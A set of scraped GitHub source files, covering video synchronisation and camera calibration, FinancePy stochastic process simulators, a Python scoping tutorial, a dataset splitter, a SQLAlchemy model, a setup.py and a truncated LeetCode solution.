        itr_max = min(number_of_video_chapters_to_evaluate, np.min(params.number_of_videos) - 1)
    elif method == 'calibration_video':
        itr_max = 1
        video_names = np.array([[params.calibration_video_names[0]], [params.calibration_video_names[1]]])
    else:
        print('ERROR: no correct method is assigned. Use either ''maximum'' or ''custom''')
        sys.exit()
    if params.single_video_mode:
        itr_max = 1
    out = np.zeros((params.number_of_cameras * itr_max, params.number_of_cameras))
    for itr_video in range(itr_max):
        print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ', itr_video * params.number_of_cameras + 0
              + 1, '/', itr_max * params.number_of_cameras)
        # Pick video file name
        itr_camera = 0
        video_file = params.path_in + str('/') + params.camera_names[itr_camera] + str('/') + \
            video_names[itr_camera][itr_video]
        res_audio = extract_audio(params, video_file)
        # One audio column per camera, zero-padded to camera 0's length.
        y = np.zeros((len(res_audio), params.number_of_cameras))
        max_length = len(res_audio)
        y[:len(res_audio), 0] = res_audio
        if params.number_of_cameras > 2:
            for i in range(1, params.number_of_cameras):
                print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ',
                      itr_video * params.number_of_cameras + i + 1, '/', itr_max * params.number_of_cameras)
                itr_camera = i
                video_file = params.path_in + str('/') + params.camera_names[itr_camera] + str('/') + \
                    video_names[itr_camera][itr_video]
                res_audio = extract_audio(params, video_file)
                y[:len(res_audio), i] = res_audio
        else:
            # NOTE(review): in this 2-camera branch `i` is not set here —
            # it relies on `i` leaking from the base-code loop above
            # (== number_of_cameras - 1 == 1), which happens to be the
            # right column index.  Fragile; confirm and make explicit.
            print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ',
                  itr_video * params.number_of_cameras + i + 1, '/', itr_max * params.number_of_cameras)
            video_file = params.path_in + str('/') + params.camera_names[1] + str('/') + \
                video_names[1][itr_video]
            res_audio = extract_audio(params, video_file)
            y[:min(len(res_audio), max_length), i] = res_audio[:min(len(res_audio), max_length)]
        # Pairwise cross-correlation: lag of camera m relative to camera k,
        # converted from audio samples to seconds.
        lag = np.zeros((params.number_of_cameras, params.number_of_cameras))
        for k in range(params.number_of_cameras):
            for m in range(params.number_of_cameras):
                corr = fftconvolve(y[:, k], y[::-1, m], mode='full')
                offset = np.argmax(corr)
                lag[k, m] = ((2 * y[:, k].size - 1) // 2 - offset) / int(params.sample_rate_audio)
        out[itr_video * params.number_of_cameras:(itr_video + 1) * params.number_of_cameras, :] = get_shifted_matrix(
            lag)
    return out
def clean_video_names(params):
    """Re-index video folders and separate calibration cuts from chapters.

    Files containing "cut_cal" are recorded as the per-camera calibration
    video; every "cut" file (including the "cut_cal" ones) is removed from
    the chapter list so only original chapters remain in video_names.
    """
    # Re-index video names
    for idx in range(params.number_of_cameras):
        params.video_names[idx] = np.sort(os.listdir(params.path_in + '/' + params.camera_names[idx]))
    # Index calibration videos and remove names from original video list
    for i in range(params.number_of_cameras):
        temp = params.video_names[i][:]
        j = 0
        while j < len(temp):
            if 'cut_cal' in temp[j]:
                params.calibration_video_names[i] = temp[j]
            if 'cut' in temp[j]:
                # Drop the entry and stay at the same index for the next pass.
                temp = np.delete(temp, j)
                j -= 1
            j += 1
        params.video_names[i] = np.sort(temp)
        # j ends up as the number of remaining (non-cut) videos.
        params.number_of_videos[i] = j
    return params
def compute_3d_matrices_matlab(params):
    """Run the MATLAB stereo-calibration script for each camera pair.

    Cameras are paired as (0,1), (2,3), ...; each pair's synced
    calibration videos are passed to python_run_matlab_camera_calibration,
    which writes its output under results/calib_results/<deployment>_<pair>.
    Requires params.path_to_matlab to point at the MATLAB binary.
    """
    for set_number in range(params.number_of_cameras // 2):
        name1 = params.path_in + '/' + params.camera_names[set_number * 2] + '/' + \
            params.calibration_video_names[set_number * 2]
        name2 = params.path_in + '/' + params.camera_names[set_number * 2 + 1] + '/' + \
            params.calibration_video_names[set_number * 2 + 1]
        folder_names = params.path_in.split('/')
        save_folder = 'results/calib_results/' + folder_names[-3] + '_' + folder_names[-2] + '_' + folder_names[-1] + \
            '_' + params.camera_names[set_number * 2] + params.camera_names[set_number * 2 + 1]
        if not os.path.exists(save_folder):
            os.makedirs(save_folder)
        os.system(
            params.path_to_matlab + ' -nodesktop -nosplash -r "python_run_matlab_camera_calibration(\'' + name1 +
            '\',\'' + name2 + '\',\'' + save_folder + '\')"')
def generate_calibration_images(params, frames_per_x_sec):
    """Dump frames from both calibration videos into images/calib_images.

    The target folder is emptied first (files, links and sub-folders are
    all removed), then frames are extracted from the first two cameras'
    calibration videos at one frame every frames_per_x_sec seconds.
    """
    name1 = os.path.join(params.path_in, params.camera_names[0], params.calibration_video_names[0])
    name2 = os.path.join(params.path_in, params.camera_names[1], params.calibration_video_names[1])
    folder = 'images/calib_images'
    # Clean folders
    for filename in os.listdir(folder):
        file_path = os.path.join(folder, filename)
        try:
            if os.path.isfile(file_path) or os.path.islink(file_path):
                os.unlink(file_path)
            elif os.path.isdir(file_path):
                shutil.rmtree(file_path)
        except Exception as e:
            # Best-effort cleanup: report and continue.
            print('Failed to delete %s. Reason: %s' % (file_path, e))
    ip.extract_frames(name1, frames_per_x_sec, folder=folder)
    ip.extract_frames(name2, frames_per_x_sec, folder=folder)
def compute_3d_matrices_matlab_single_video(params, squareSizeMM, save_folder):
    """Run the MATLAB single-video calibration on the two frame folders.

    Passes the image directories extracted from each camera's calibration
    video, the frame size and the checkerboard square size (mm) to
    python_run_code_calib_videos.  Requires params.path_to_matlab to point
    at the MATLAB binary.
    """
    base_name1 = os.path.splitext(os.path.basename(params.calibration_video_names[0]))[0]
    output_directory1 = os.path.join('images/calib_images', base_name1)
    # Bug fix: the second directory must come from the SECOND camera's
    # calibration video — the original reused index 0, so the same folder
    # was passed to MATLAB twice.
    base_name2 = os.path.splitext(os.path.basename(params.calibration_video_names[1]))[0]
    output_directory2 = os.path.join('images/calib_images', base_name2)
    os.system(
        params.path_to_matlab + ' -nodesktop -nosplash -r "python_run_code_calib_videos(\'' + output_directory1 +
        '\',\'' + output_directory2 + '\',\'' + str(params.height) + '\',\'' + str(
            params.width) + '\',\'' + squareSizeMM +
        '\',\'' + save_folder + '\')"')
def detect_calibration_videos(deployment):
    """Find, per camera, the video chapter showing the calibration checkerboard.

    The scratch frame folder is emptied, then for every camera the chapters
    whose code precedes the base code and that run longer than 60 s are
    scanned: frames sampled every ``delta_t`` seconds are searched for an
    8x11 chessboard with OpenCV.  When at least two detections occur, the
    video name and the padded detection interval are stored on *deployment*.
    """
    # Empty the temporary frame-extraction folder (best effort).
    for filename in os.listdir('images/temp_detect_calib_video'):
        file_path = os.path.join('images/temp_detect_calib_video', filename)
        try:
            if os.path.isfile(file_path) or os.path.islink(file_path):
                os.unlink(file_path)
            elif os.path.isdir(file_path):
                shutil.rmtree(file_path)
        except Exception as e:
            print('Failed to delete %s. Reason: %s' % (file_path, e))
    for i in range(deployment.number_of_cameras):
        files = deployment.video_names[i][:]
        potential_calib_videos = []
        if not deployment.base_code[i]:
            # NOTE(review): this aborts detection for ALL remaining cameras,
            # not just this one — confirm `continue` was not intended.
            return
        for name in files:
            # Bug fix: the original test `('.mp4' or '.MP4' in name)` was
            # always truthy ('.mp4' is a non-empty literal), so the
            # extension was never actually checked; test it properly so
            # non-video files are skipped.
            if ('.mp4' in name or '.MP4' in name) and (name[4:8] < deployment.base_code[i]):
                path = os.path.join(deployment.path_in, deployment.camera_names[i], name)
                # Probe the chapter's duration via ffprobe JSON output.
                temp_file = os.path.splitext(name)[0] + '.json'
                subprocess.run(
                    'ffprobe -v quiet -print_format json -show_format -show_streams {} > {}'.format(path, temp_file),
                    shell=True)
                metadata = json.load(open(temp_file, 'r'))
                os.remove(temp_file)
                duration = float((metadata['streams'][1]['duration']))
                if duration > 60:
                    potential_calib_videos.append(name)
        delta_t = 4  # seconds between sampled frames
        for j in range(len(potential_calib_videos)):
            path_in = os.path.join(deployment.path_in, deployment.camera_names[i], potential_calib_videos[j])
            img_folder = ip.extract_frames(path_in, delta_t, folder='images/temp_detect_calib_video')
            rows = 8  # number of checkerboard rows.
            columns = 11  # number of checkerboard columns.
            img_dir_list = os.listdir(img_folder)
            t_detect = []
            t = 0
            for img_name in img_dir_list:
                img = cv2.imread(os.path.join(img_folder, img_name), 0)
                ret, corners = cv2.findChessboardCorners(img, (rows, columns), None)
                if ret:
                    t_detect.append(t)
                t += delta_t
                print('Searching for checkerboards image at time: ', str(datetime.timedelta(seconds=t)))
            # Require at least two detections before accepting the chapter.
            if len(t_detect) > 1:
                interval_calib_video = [max(0, min(t_detect) - delta_t), max(t_detect) + delta_t]
                deployment.calibration_video_names[i] = potential_calib_videos[j]
                deployment.calib_interval.append(interval_calib_video)
def cut_calibration_videos(params):
    """Cut synced "<name>_cal" calibration clips for every camera (mode-1 workflow).

    The cut window is the union of all detected checkerboard intervals,
    shifted by each camera's calibration lag.  Existing "_cal" files are
    kept and only reported, so deleting them forces a re-sync.
    """
    c = 0
    for name in params.calibration_video_names:
        temp = name.split('.')
        path_input = os.path.join(params.path_in, params.camera_names[c], name)
        if '_cal' not in temp[0]:
            # First run: derive the "_cal" output name and record it.
            path_output = os.path.join(params.path_in, params.camera_names[c], temp[0] + '_cal.' + temp[1])
            params.calibration_video_names[c] = temp[0] + '_cal.' + temp[1]
            cal_video_name = temp[1]
        else:
            path_output = os.path.join(params.path_in, params.camera_names[c], name)
            cal_video_name = name
        if os.path.exists(path_output):
            print('Calibration video', cal_video_name,
                  'was found. Delete this file to re-sync video')
        else:
            # Cut from the earliest interval start to the latest interval
            # end, offset by this camera's calibration lag (seconds).
            intervals = np.array(params.calib_interval)
            s_start = params.lag_out_cal[c] + min(intervals[:, 0])
            s_end = params.lag_out_cal[c] + max(intervals[:, 1])
            ip.cut_video(path_input, path_output, s_start, s_end)
        c += 1
def list_all_deployments(path_in):
    """Return every path exactly two directory levels below *path_in*.

    The deployment tree is laid out as <path_in>/<site>/<deployment>;
    each second-level entry is returned as a joined path.
    """
    return [
        os.path.join(path_in, top_level, deployment)
        for top_level in os.listdir(path_in)
        for deployment in os.listdir(os.path.join(path_in, top_level))
    ]
| lkoopmans/3D_reconstruction_stationary_array | lib/SyncVideoSet.py | SyncVideoSet.py | py | 26,269 | python | en | code | 0 | github-code | 13 |
4320583991 | ##############################################################################
# Copyright (C) 2018, 2019, 2020 Dominic O'Kane
##############################################################################
from math import sqrt, exp, log
from enum import Enum
from numba import njit, float64, int64
import numpy as np
from ..utils.error import FinError
from ..utils.math import norminvcdf
###############################################################################
class ProcessTypes(Enum):
    """Stochastic process families selectable in FinProcessSimulator.get_process.

    NOTE: CEV and JUMP_DIFFUSION are declared here but not handled by
    get_process in this file (they raise FinError there).
    """
    GBM = 1
    CIR = 2
    HESTON = 3
    VASICEK = 4
    CEV = 5
    JUMP_DIFFUSION = 6
###############################################################################
class FinProcessSimulator():
    """Facade that dispatches Monte-Carlo path generation to the numba kernels."""

    def __init__(self):
        pass

    def get_process(
            self,
            process_type,
            t,
            model_params,
            numAnnSteps,
            num_paths,
            seed):
        """Simulate paths of the requested process.

        process_type: a ProcessTypes member (GBM, HESTON, VASICEK or CIR;
            anything else raises FinError).
        t: horizon in years.
        model_params: process-specific tuple — its last element is always
            the numerical-scheme enum whose .value is forwarded.
        numAnnSteps: time steps per year (step size dt = 1/numAnnSteps).
        num_paths: number of Monte-Carlo paths.
        seed: RNG seed for reproducibility.
        Returns the path array produced by the corresponding kernel.
        """
        if process_type == ProcessTypes.GBM:
            (stock_price, drift, volatility, scheme) = model_params
            paths = get_gbm_paths(num_paths, numAnnSteps, t, drift,
                                  stock_price, volatility, scheme.value, seed)
            return paths
        elif process_type == ProcessTypes.HESTON:
            (stock_price, drift, v0, kappa, theta,
             sigma, rho, scheme) = model_params
            paths = get_heston_paths(num_paths,
                                     numAnnSteps,
                                     t,
                                     drift,
                                     stock_price,
                                     v0,
                                     kappa,
                                     theta,
                                     sigma,
                                     rho,
                                     scheme.value,
                                     seed)
            return paths
        elif process_type == ProcessTypes.VASICEK:
            (r0, kappa, theta, sigma, scheme) = model_params
            paths = get_vasicek_paths(
                num_paths,
                numAnnSteps,
                t,
                r0,
                kappa,
                theta,
                sigma,
                scheme.value,
                seed)
            return paths
        elif process_type == ProcessTypes.CIR:
            (r0, kappa, theta, sigma, scheme) = model_params
            paths = get_cir_paths(num_paths, numAnnSteps, t,
                                  r0, kappa, theta, sigma, scheme.value, seed)
            return paths
        else:
            # CEV and JUMP_DIFFUSION are declared in ProcessTypes but have
            # no kernel wired up here, so they land in this branch too.
            raise FinError("Unknown process" + str(process_type))
###############################################################################
class FinHestonNumericalScheme(Enum):
    """Discretisation schemes accepted by get_heston_paths (passed as .value)."""
    EULER = 1      # Euler on price with variance truncation
    EULERLOG = 2   # Euler on log-price with variance truncation
    QUADEXP = 3    # Andersen (2006) quadratic-exponential scheme
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64, float64, float64,
                    float64, float64, float64, int64, int64),
      cache=True, fastmath=True)
def get_heston_paths(num_paths,
                     numAnnSteps,
                     t,
                     drift,
                     s0,
                     v0,
                     kappa,
                     theta,
                     sigma,
                     rho,
                     scheme,
                     seed):
    """Monte-Carlo simulation of Heston stock-price paths.

    scheme selects EULER (first-order scheme with variance truncation),
    EULERLOG (the same scheme on log-price), or QUADEXP (Andersen's
    Quadratic-Exponential scheme, per the comment below).  Returns an array
    of shape (num_paths, num_steps + 1) with sPaths[:, 0] == s0.
    """
    np.random.seed(seed)
    dt = 1.0 / numAnnSteps
    num_steps = int(t / dt)
    sPaths = np.empty(shape=(num_paths, num_steps + 1))
    sPaths[:, 0] = s0
    sdt = sqrt(dt)
    rhohat = sqrt(1.0 - rho * rho)  # orthogonal component of the stock shock
    sigma2 = sigma * sigma
    if scheme == FinHestonNumericalScheme.EULER.value:
        # Basic scheme to first order with truncation on variance
        for iPath in range(0, num_paths):
            s = s0
            v = v0
            for iStep in range(1, num_steps + 1):
                z1 = np.random.normal(0.0, 1.0) * sdt
                z2 = np.random.normal(0.0, 1.0) * sdt
                zV = z1
                zS = rho * z1 + rhohat * z2  # stock shock correlated with variance shock
                vplus = max(v, 0.0)  # truncation: floor negative variance at zero
                rtvplus = sqrt(vplus)
                v += kappa * (theta - vplus) * dt + sigma * \
                    rtvplus * zV + 0.25 * sigma2 * (zV * zV - dt)
                s += drift * s * dt + rtvplus * s * \
                    zS + 0.5 * s * vplus * (zV * zV - dt)
                sPaths[iPath, iStep] = s
    elif scheme == FinHestonNumericalScheme.EULERLOG.value:
        # Basic scheme to first order with truncation on variance
        for iPath in range(0, num_paths):
            x = log(s0)  # evolve the log-price to guarantee positivity
            v = v0
            for iStep in range(1, num_steps + 1):
                zV = np.random.normal(0.0, 1.0) * sdt
                zS = rho * zV + rhohat * np.random.normal(0.0, 1.0) * sdt
                vplus = max(v, 0.0)
                rtvplus = sqrt(vplus)
                x += (drift - 0.5 * vplus) * dt + rtvplus * zS
                v += kappa * (theta - vplus) * dt + sigma * \
                    rtvplus * zV + sigma2 * (zV * zV - dt) / 4.0
                sPaths[iPath, iStep] = exp(x)
    elif scheme == FinHestonNumericalScheme.QUADEXP.value:
        # Due to Leif Andersen(2006)
        Q = exp(-kappa * dt)
        psic = 1.50  # switching threshold between the quadratic and exponential samplers
        gamma1 = 0.50
        gamma2 = 0.50
        K0 = -rho * kappa * theta * dt / sigma
        K1 = gamma1 * dt * (kappa * rho / sigma - 0.5) - rho / sigma
        K2 = gamma2 * dt * (kappa * rho / sigma - 0.5) + rho / sigma
        K3 = gamma1 * dt * (1.0 - rho * rho)
        K4 = gamma2 * dt * (1.0 - rho * rho)
        A = K2 + 0.5 * K4
        mu = drift
        c1 = sigma2 * Q * (1.0 - Q) / kappa
        c2 = theta * sigma2 * ((1.0 - Q)**2) / 2.0 / kappa
        for iPath in range(0, num_paths):
            x = log(s0)
            vn = v0
            for iStep in range(1, num_steps + 1):
                zV = np.random.normal(0, 1)
                zS = rho * zV + rhohat * np.random.normal(0, 1)
                m = theta + (vn - theta) * Q  # conditional mean of the next variance
                m2 = m * m
                s2 = c1 * vn + c2  # conditional variance of the next variance
                psi = s2 / m2
                u = np.random.uniform(0.0, 1.0)
                if psi <= psic:
                    # "quadratic" sampler: vnp = a * (b + Z)^2
                    b2 = 2.0 / psi - 1.0 + \
                        sqrt((2.0 / psi) * (2.0 / psi - 1.0))
                    a = m / (1.0 + b2)
                    b = sqrt(b2)
                    zV = norminvcdf(u)
                    vnp = a * ((b + zV)**2)
                    d = (1.0 - 2.0 * A * a)
                    M = exp((A * b2 * a) / d) / sqrt(d)
                    K0 = -log(M) - (K1 + 0.5 * K3) * vn  # martingale correction
                else:
                    # "exponential" sampler: point mass at 0 plus exponential tail
                    p = (psi - 1.0) / (psi + 1.0)
                    beta = (1.0 - p) / m
                    if u <= p:
                        vnp = 0.0
                    else:
                        vnp = log((1.0 - p) / (1.0 - u)) / beta
                    M = p + beta * (1.0 - p) / (beta - A)
                    K0 = -log(M) - (K1 + 0.5 * K3) * vn  # martingale correction
                x += mu * dt + K0 + (K1 * vn + K2 * vnp) + \
                    sqrt(K3 * vn + K4 * vnp) * zS
                sPaths[iPath, iStep] = exp(x)
                vn = vnp
    else:
        # NOTE(review): "Schme" typo is in the original message.
        raise FinError("Unknown FinHestonNumericalSchme")
    return sPaths
###############################################################################
class FinGBMNumericalScheme(Enum):
    """Path-generation modes for get_gbm_paths; ANTITHETIC doubles the
    number of returned paths by mirroring every normal draw."""
    NORMAL = 1
    ANTITHETIC = 2
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
                    float64, int64, int64), cache=True, fastmath=True)
def get_gbm_paths(num_paths, numAnnSteps, t, mu, stock_price, sigma, scheme, seed):
    """Simulate geometric Brownian motion paths.

    Returns an array of shape (num_paths, N + 1) for the NORMAL scheme and
    (2 * num_paths, N + 1) for ANTITHETIC, where the second half of the rows
    uses the negated normal draws.  Column 0 holds the initial stock price.
    """
    np.random.seed(seed)
    dt = 1.0 / numAnnSteps
    num_time_steps = int(t / dt + 0.50)
    vsqrt_dt = sigma * sqrt(dt)
    m = exp((mu - sigma * sigma / 2.0) * dt)  # one-step drift factor
    if scheme == FinGBMNumericalScheme.NORMAL.value:
        Sall = np.empty((num_paths, num_time_steps + 1))
        Sall[:, 0] = stock_price
        for it in range(1, num_time_steps + 1):
            g1D = np.random.standard_normal((num_paths))
            for ip in range(0, num_paths):
                w = np.exp(g1D[ip] * vsqrt_dt)
                Sall[ip, it] = Sall[ip, it - 1] * m * w
    elif scheme == FinGBMNumericalScheme.ANTITHETIC.value:
        Sall = np.empty((2 * num_paths, num_time_steps + 1))
        Sall[:, 0] = stock_price
        for it in range(1, num_time_steps + 1):
            g1D = np.random.standard_normal((num_paths))
            for ip in range(0, num_paths):
                w = np.exp(g1D[ip] * vsqrt_dt)
                Sall[ip, it] = Sall[ip, it - 1] * m * w
                # mirrored path: divide instead of multiply by the shock
                Sall[ip + num_paths, it] = Sall[ip + num_paths, it - 1] * m / w
    else:
        raise FinError("Unknown FinGBMNumericalScheme")
    # m = np.mean(Sall[:, -1])
    # v = np.var(Sall[:, -1]/Sall[:, 0])
    # print("GBM", num_paths, numAnnSteps, t, mu, stock_price, sigma, scheme, m,v)
    return Sall
###############################################################################
class FinVasicekNumericalScheme(Enum):
    """Path-generation modes for get_vasicek_paths; ANTITHETIC doubles the
    path count by reusing each normal draw with its sign flipped."""
    NORMAL = 1
    ANTITHETIC = 2
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
                    float64, float64, int64, int64), cache=True, fastmath=True)
def get_vasicek_paths(num_paths,
                      numAnnSteps,
                      t,
                      r0,
                      kappa,
                      theta,
                      sigma,
                      scheme,
                      seed):
    """Simulate Vasicek (mean-reverting Ornstein-Uhlenbeck) short-rate paths.

    NORMAL returns an array of shape (num_paths, num_steps + 1); ANTITHETIC
    returns (2 * num_paths, num_steps + 1) with the second half of the rows
    driven by the negated normal draws.  Column 0 holds r0.
    """
    np.random.seed(seed)
    dt = 1.0 / numAnnSteps
    num_steps = int(t / dt)
    sigmasqrt_dt = sigma * sqrt(dt)
    if scheme == FinVasicekNumericalScheme.NORMAL.value:
        rate_path = np.empty((num_paths, num_steps + 1))
        rate_path[:, 0] = r0
        for iPath in range(0, num_paths):
            r = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                # Euler step: mean reversion towards theta plus Gaussian shock
                r += kappa * (theta - r) * dt + z[iStep - 1] * sigmasqrt_dt
                rate_path[iPath, iStep] = r
    elif scheme == FinVasicekNumericalScheme.ANTITHETIC.value:
        rate_path = np.empty((2 * num_paths, num_steps + 1))
        rate_path[:, 0] = r0
        for iPath in range(0, num_paths):
            r1 = r0
            r2 = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                r1 = r1 + kappa * (theta - r1) * dt + \
                    z[iStep - 1] * sigmasqrt_dt
                r2 = r2 + kappa * (theta - r2) * dt - \
                    z[iStep - 1] * sigmasqrt_dt
                rate_path[iPath, iStep] = r1
                rate_path[iPath + num_paths, iStep] = r2
    else:
        # Previously an unknown scheme fell through to `return rate_path`
        # with rate_path never assigned; fail loudly like the other
        # simulators in this module instead.
        raise FinError("Unknown FinVasicekNumericalScheme")
    return rate_path
###############################################################################
class CIRNumericalScheme(Enum):
    """Discretisation schemes accepted by get_cir_paths.

    NOTE(review): EXACT is declared here but has no implementation in
    get_cir_paths.
    """
    EULER = 1
    LOGNORMAL = 2
    MILSTEIN = 3
    KAHLJACKEL = 4
    EXACT = 5  # SAMPLES EXACT DISTRIBUTION
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64,
                    float64, float64, int64, int64), cache=True, fastmath=True)
def get_cir_paths(num_paths,
                  numAnnSteps,
                  t,
                  r0,
                  kappa,
                  theta,
                  sigma,
                  scheme,
                  seed):
    """Simulate CIR (square-root mean-reverting) short-rate paths.

    Returns an array of shape (num_paths, num_steps + 1) with column 0 set
    to r0.  scheme selects the discretisation: EULER (with truncation of
    negative rates in the diffusion term), LOGNORMAL (moment-matched
    lognormal step), MILSTEIN, or KAHLJACKEL.
    """
    np.random.seed(seed)
    dt = 1.0 / numAnnSteps
    num_steps = int(t / dt)
    rate_path = np.empty(shape=(num_paths, num_steps + 1))
    rate_path[:, 0] = r0
    if scheme == CIRNumericalScheme.EULER.value:
        sigmasqrt_dt = sigma * sqrt(dt)
        for iPath in range(0, num_paths):
            r = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                rplus = max(r, 0.0)  # truncation: sqrt needs a non-negative rate
                sqrtrplus = sqrt(rplus)
                r = r + kappa * (theta - rplus) * dt + \
                    sigmasqrt_dt * z[iStep - 1] * sqrtrplus
                rate_path[iPath, iStep] = r
    elif scheme == CIRNumericalScheme.LOGNORMAL.value:
        x = exp(-kappa * dt)
        y = 1.0 - x
        for iPath in range(0, num_paths):
            r = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                # match the conditional mean/variance of the CIR step with a
                # lognormal draw, which keeps the rate strictly positive
                mean = x * r + theta * y
                var = sigma * sigma * y * (x * r + 0.50 * theta * y) / kappa
                sig = sqrt(log(1.0 + var / (mean * mean)))
                r = mean * exp(-0.5 * sig * sig + sig * z[iStep - 1])
                rate_path[iPath, iStep] = r
    elif scheme == CIRNumericalScheme.MILSTEIN.value:
        sigmasqrt_dt = sigma * sqrt(dt)
        sigma2dt = sigma * sigma * dt / 4.0
        for iPath in range(0, num_paths):
            r = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                sqrtrplus = sqrt(max(r, 0.0))
                r = r + kappa * (theta - r) * dt + \
                    z[iStep - 1] * sigmasqrt_dt * sqrtrplus
                r = r + sigma2dt * (z[iStep - 1]**2 - 1.0)  # Milstein correction
                rate_path[iPath, iStep] = r
    elif scheme == CIRNumericalScheme.KAHLJACKEL.value:
        bhat = theta - sigma * sigma / 4.0 / kappa
        sqrt_dt = sqrt(dt)
        for iPath in range(0, num_paths):
            r = r0
            z = np.random.normal(0.0, 1.0, size=(num_steps))
            for iStep in range(1, num_steps + 1):
                beta = z[iStep - 1] / sqrt_dt
                sqrtrplus = sqrt(max(r, 0.0))
                c = 1.0 + (sigma * beta - 2.0 * kappa *
                           sqrtrplus) * dt / 4.0 / sqrtrplus
                r = r + (kappa * (bhat - r) + sigma *
                         beta * sqrtrplus) * c * dt
                rate_path[iPath, iStep] = r
    else:
        # Previously an unknown scheme (including the declared-but-unimplemented
        # EXACT) silently returned the uninitialised np.empty buffer; fail
        # loudly like the other simulators in this module instead.
        raise FinError("Unknown CIRNumericalScheme")
    return rate_path
###############################################################################
| domokane/FinancePy | financepy/models/process_simulator.py | process_simulator.py | py | 14,570 | python | en | code | 1,701 | github-code | 13 |
26972998662 | # lets say we have 2 variables arrange in following way
name = "Anurag" # <- global name (module scope)
def foo(): # <- the *name* foo itself lives in the global scope
    # global name   (uncommenting this statement would make foo rebind the global)
    name = "Sayan" # <- local variable: shadows the global `name` inside foo only
def bar():
    foo()
    if something: # NOTE(review): `something` is never defined -> NameError if bar() runs
        name = "lksdjfks"
foo()
print(name) # prints "Anurag": foo's assignment never touched the global
if something: # NOTE(review): NameError here at module level -- `something` is undefined
    name = "lksdjfks"
# When you initialize a name without any indentation (at the top level of the
# program), that name is said to be initialized in the global scope.
# AND
# when we create a name inside a 'class' or 'function', it is said to be local to that 'class' or 'function'.
# What is scope?
# It is the concept we use when talking about any kind of name (variable name, function, etc.):
# where that name belongs and from where we can access it.
# Categories of scope:
# 1. global - names which can be accessed anywhere in the program
# 2. local - names which are only accessible in some portion (like a function) of the program.
| annup76779/python5tutor | sayan/old_files/scopes.py | scopes.py | py | 899 | python | en | code | 0 | github-code | 13 |
21935309326 | import numpy as np
import pickle

from utils import get_immediate_subdirectories

# Split every dataset found under root_dir into train/test/validation parts.
root_dir = './data_dir'
data_file = 'data.txt'
targets_file = 'index_target.txt'
features_file = 'index_features.txt'

split_test = 0.15   # fraction of rows reserved for the test split
split_valid = 0.15  # fraction of rows reserved for the validation split

dirs = get_immediate_subdirectories('./data_dir')

# Renamed the loop variable from `dir` (which shadowed the builtin) to
# `dataset_name`.
for dataset_name in dirs:
    data_path = f'{root_dir}/{dataset_name}/data/{data_file}'
    targets_path = f'{root_dir}/{dataset_name}/data/{targets_file}'
    features_path = f'{root_dir}/{dataset_name}/data/{features_file}'

    data = np.loadtxt(data_path)
    index_targets = np.loadtxt(targets_path)
    index_features = np.loadtxt(features_path)

    # Re-seed per dataset so every dataset gets the same reproducible shuffle.
    np.random.seed(1)
    np.random.shuffle(data)

    # Feature columns are listed in the index file; the target is one column.
    x = data[:, [int(i) for i in index_features.tolist()]]
    y = data[:, int(index_targets.tolist())]

    test_start = int((1 - split_test - split_valid) * len(data))
    valid_start = int((1 - split_valid) * len(data))

    x_train = x[:test_start, :]
    y_train = y[:test_start]
    train_set = [x_train, y_train]

    x_test = x[test_start:valid_start, :]
    y_test = y[test_start:valid_start]
    test_set = [x_test, y_test]

    x_valid = x[valid_start:, :]
    y_valid = y[valid_start:]
    valid_set = [x_valid, y_valid]

    # with open(f'../data/{dataset_name}.pkl', 'wb') as f:
    #     pickle.dump((train_set, test_set, valid_set), f)

    print(f'dataset: {dataset_name}, len:{len(data)}, train len: {len(x_train)}, test len: {len(x_test)}, valid len: {len(x_valid)}')
| MJHutchinson/BayesMLP | utils/convert_dataset.py | convert_dataset.py | py | 1,426 | python | en | code | 1 | github-code | 13 |
26717381504 | from sqlalchemy.orm import declarative_base
from sqlalchemy import Integer, Column, VARCHAR, DECIMAL
Base = declarative_base()
class Product(Base):
    """SQLAlchemy declarative model for one row of the `product` table."""
    __tablename__ = 'product'
    # surrogate primary key
    id: int = Column(Integer, primary_key=True)
    # product name, capped at 20 characters
    name = Column(VARCHAR(20))
    # price stored as an exact decimal
    price = Column(DECIMAL)
    def __str__(self):
        return f"id: {self.id}\nname: {self.name}\nprice: {self.price}"
| ashcherbyna1/hw_anastasiia_shcherbyna | models/product.py | product.py | py | 386 | python | en | code | 0 | github-code | 13 |
70095219537 | import setuptools
# Package metadata and build configuration for dsplib.
with open('README.md', 'r') as fh:
    long_description = fh.read()

setuptools.setup(
    name='dsplib',
    version='1.0.0',
    author='Zach Beever',
    author_email='zbeever@bu.edu',
    description='Small DSP library.',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/zbeever/dsplib',
    # `requires` is legacy PEP 314 metadata that pip ignores;
    # `install_requires` is what actually pulls the dependencies in.
    install_requires=['numpy', 'tqdm', 'numba'],
    license='MIT',
    keywords=['digital signal processing', 'dsp', 'wavelet', 'fourier', 'fft', 'stft', 'dwt', 'dtwt', 'hilbert'],
    packages=setuptools.find_packages(),
    package_data={'': ['*.txt', '*.md']},
    classifiers=[
        'Programming Language :: Python :: 3',
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT License',
        'Topic :: Scientific/Engineering'
    ],
    python_requires='>=3.6',
)
| zbeever/dsplib | setup.py | setup.py | py | 920 | python | en | code | 0 | github-code | 13 |
22334472955 | #Leetcode 925. Long Pressed Name
class Solution:
    def isLongPressedName(self, name: str, typed: str) -> bool:
        """LeetCode 925: return True if `typed` could result from typing
        `name` with some characters long-pressed (repeated extra times).

        Two-pointer scan: each typed character either matches the next
        expected name character or must repeat the previous typed one.
        """
        i = 0  # next unmatched position in name
        j = 0  # current position in typed
        n = len(name)
        m = len(typed)
        while j<m:
            if i<n and name[i] == typed[j]:
                i+=1  # typed[j] consumes the next expected character
